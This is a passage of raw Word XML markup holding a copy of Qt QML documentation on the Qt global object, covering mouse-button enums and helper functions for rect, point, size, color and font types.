    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The Qt object contains the enums available in the</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1530" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Namespace</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For example, you can access the</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1531" w:anchor="MouseButton-enum" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt::LeftButton</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1532" w:anchor="MouseButton-enum" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt::RightButton</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enumeration values as</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt.LeftButton</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt.RightButton</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1268" w:name="types"/>
      <w:bookmarkStart w:id="1269" w:name="_Toc483000796"/>
      <w:bookmarkStart w:id="1270" w:name="_Toc483003794"/>
      <w:bookmarkStart w:id="1271" w:name="_Toc483604148"/>
      <w:bookmarkStart w:id="1272" w:name="_Toc483605368"/>
      <w:bookmarkEnd w:id="1268"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1269"/>
      <w:bookmarkEnd w:id="1270"/>
      <w:bookmarkEnd w:id="1271"/>
      <w:bookmarkEnd w:id="1272"/>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Qt object also contains </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>helper functions for creating objects of specific data types</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is primarily </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>useful when setting the properties of an item when the property has one of the following types</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>rect</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- use</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1533" w:anchor="rect-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.rect()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>point</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- use</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1534" w:anchor="point-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.point()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- use</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1535" w:anchor="size-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.size()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module has been imported, the following helper functions for creating objects of specific data types are also available for clients to use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- use</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1536" w:anchor="rgba-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.rgba()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1537" w:anchor="hsla-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.hsla()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1538" w:anchor="darker-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.darker()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1539" w:anchor="lighter-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.lighter()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1540" w:anchor="tint-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.tint()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>font</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
